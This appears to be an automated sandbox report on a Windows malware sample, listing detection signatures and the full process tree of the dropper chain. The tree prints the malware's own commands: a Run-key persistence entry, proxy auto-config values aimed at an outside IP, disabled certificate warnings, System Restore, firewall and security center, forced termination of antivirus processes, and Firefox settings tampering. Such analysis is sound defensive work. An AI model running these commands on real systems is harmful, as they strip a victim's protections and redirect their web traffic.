Analysis

  • max time kernel
    121s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240704-en locale:en-us os:windows7-x64 system
  • submitted
    22-08-2024 06:25

General

  • Target

    b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe

  • Size

    179KB

  • MD5

    b6a780d8d5c7786c5f10cb9f96fddf51

  • SHA1

    3521bfb3f50d4ad831e8f52fda4c5f536a213ae6

  • SHA256

    9327363fb599980ef259feabaadad4bbb7aa724b2315796df62e1a2f0e9c5a78

  • SHA512

    0762471708f0fc8f7461a7760d5b2414a7f94cfa314d959d498559199edc14d602c270963fa351bd7c89de88fdb14fa9f23d08ad6c4b01aac95ee48dde23c459

  • SSDEEP

    3072:oYP2XerzhOUxu/XUtauVL2efff5W9FoP/UT7wrKr0uz:ou2urzh9xu/XkauVLj56FoP7KoO

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive information.

  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 20 IoCs
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2312
    • C:\Users\Admin\AppData\Local\Temp\arquivo.exe
      "C:\Users\Admin\AppData\Local\Temp\arquivo.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7E54.tmp\arquivo.bat" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Users\Admin\AppData\Local\Temp\ph.exe
          ph.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\7EE0.tmp\video.bat" "
            5⤵
            • Drops file in Drivers directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2700
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2804
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "JavaUpdateSched" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\jusched.exe"
              6⤵
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              PID:1884
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              PID:608
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "198.173.127.140pt-BR.js" /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2452
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1792
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
              6⤵
              PID:2240
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2676
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2132
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2076
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2128
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              PID:2156
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
              6⤵
              PID:2372
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1976
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:264
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2668
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
              6⤵
              PID:2916
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2896
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "198.173.127.140pt-BR.js" /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2564
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              PID:3032
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1524
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              PID:1576
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1724
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2484
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
              6⤵
              PID:1276
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2640
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2796
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2904
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2912
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              PID:2928
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2088
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:756
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2972
              • C:\Windows\SysWOW64\find.exe
                find "prefs.js"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2448
            • C:\Windows\SysWOW64\attrib.exe
              C:\Windows\system32\attrib.exe -r -a -s -h "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js"
              6⤵
              • System Location Discovery: System Language Discovery
              • Views/modifies file attributes
              PID:2824
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2432
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1120
              • C:\Windows\SysWOW64\find.exe
                find "prefs.js"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1224
            • C:\Windows\SysWOW64\attrib.exe
              C:\Windows\system32\attrib.exe -r -a -s -h "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js"
              6⤵
              • System Location Discovery: System Language Discovery
              • Views/modifies file attributes
              PID:932
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2356
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
                7⤵
                PID:408
              • C:\Windows\SysWOW64\find.exe
                find "prefs.js"
                7⤵
                PID:2192
            • C:\Windows\SysWOW64\attrib.exe
              C:\Windows\system32\attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js"
              6⤵
              • Views/modifies file attributes
              PID:1764
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~r.tmp
              6⤵
              • System Location Discovery: System Language Discovery
              PID:668
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~r.tmp "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1332
            • C:\Windows\SysWOW64\find.exe
              C:\Windows\system32\find.exe "Internet Explorer\Main"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1164
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~i.tmp | C:\Windows\system32\find.exe "S-1-5-21"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1620
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~i.tmp "
                7⤵
                PID:680
              • C:\Windows\SysWOW64\find.exe
                C:\Windows\system32\find.exe "S-1-5-21"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1664
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              PID:2260
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1704
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              PID:2120
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:292
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              PID:2664
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f
              6⤵
              PID:2200
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo y"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2492
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1924
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" "http://ver.download-ccf.com/ver.php"
              6⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              PID:2784
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2784 CREDAT:275457 /prefetch:2
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:2840
        • C:\Windows\SysWOW64\net.exe
          net stop wscsvc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2848
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop wscsvc
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2596
        • C:\Windows\SysWOW64\sc.exe
          sc config wscsvc start= disabled
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:1320
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall set opmode mode=disable
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2176
        • C:\Windows\SysWOW64\net.exe
          net stop SharedAccess
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1520
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop SharedAccess
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2880
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgcc.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2892
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgcc.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2068
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgamsvr.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2472
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgupsvc.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2332
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgw.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1628
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgcc32.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1244
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgctrl.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1560
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgserv.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1400
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgserv9.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2252
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgserv9schedapp.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im avgw.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:776
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im ashwebsv.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:328
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im ashdisp.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2516
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im ashmaisv.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2380
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im ashserv.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2780
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im ashwebsv.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2576
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im norton.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3044
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im Norton Auto-Protect.exe
          4⤵
          • Kills process with taskkill
          PID:836
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im norton_av.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:272
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im nortonav.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2072

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Downloads
